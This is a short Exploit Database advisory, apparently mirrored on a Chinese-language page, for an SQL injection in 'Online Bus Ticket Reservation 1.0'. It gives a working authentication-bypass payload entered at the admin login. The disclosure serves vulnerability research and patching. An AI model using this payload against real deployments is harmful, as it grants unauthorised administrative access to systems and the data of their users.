Online Bus Ticket Reservation 1.0 – SQL Injection

• Exploit Database
• 14 阅读

• 作者： Sakshi Sharma
  日期： 2020-12-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49212/

• # Exploit Title: Online Bus Ticket Reservation 1.0 - SQL Injection
  # Date: 2020-12-07
  # Exploit Author: Sakshi Sharma
  # Vendor Homepage: https://www.sourcecodester.com/php/5012/online-bus-ticket-reservation-using-phpmysql.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/busreservation.zip
  # Version: 1.0
  # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
  
  
  #Vulnerable Page: admin page
  
  #Exploit
  	Open the Application
  	check the URL:
  	http://localhost/busreservation/index.php
  	Open Admin Login
  	Enter username: 'or"='
  	Enter password: 'or"='
  	click on login
  The SQL payload gets executed and authorization is bypassed successfully